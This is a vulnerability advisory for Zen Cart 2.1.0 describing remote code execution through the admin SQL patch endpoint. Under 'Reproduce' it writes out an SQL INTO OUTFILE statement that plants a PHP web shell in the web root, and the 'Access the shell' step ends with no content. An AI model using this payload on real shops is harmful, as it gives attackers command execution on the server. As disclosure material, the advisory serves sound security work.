Zencart | RCE via SQL query executor file upload
Information
| Software Type | Web App |
|---|---|
| Software Name | Zen-Cart |
| Affected Version | 2.1.0 |
| Software Vendor | Zen Ventures, LLC |
| Software Link | https://github.com/zencart/zencart |
| Severity | High |
| CVSS Score | 8.7 |
| CVE Link | N/A |
| Affected Assets | 30171+ |
| Date of Discovery | Jan 9th, 2025 |
| PoC Exploit | https://gist.github.com/0xHamy/1d114a5b745c7fbca96d292199edf034 |
Description
The [/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch] endpoint allows admins to run SQL queries. This feature was created to allow developer to manually configure or modify the database but there is a problem, this feature allows you to write files including PHP shells and access them which results in RCE. This is because secure_file_priv is not set, creating a critical security issue.
Reproduce
Go to the following endpoint:
/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch
Use the following SQL command to upload shell to zencart directory:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/zencart/shell.php';Access the shell:
Proof of Concept (PoC) Video
Posted on: May 24, 2025 06:03 AM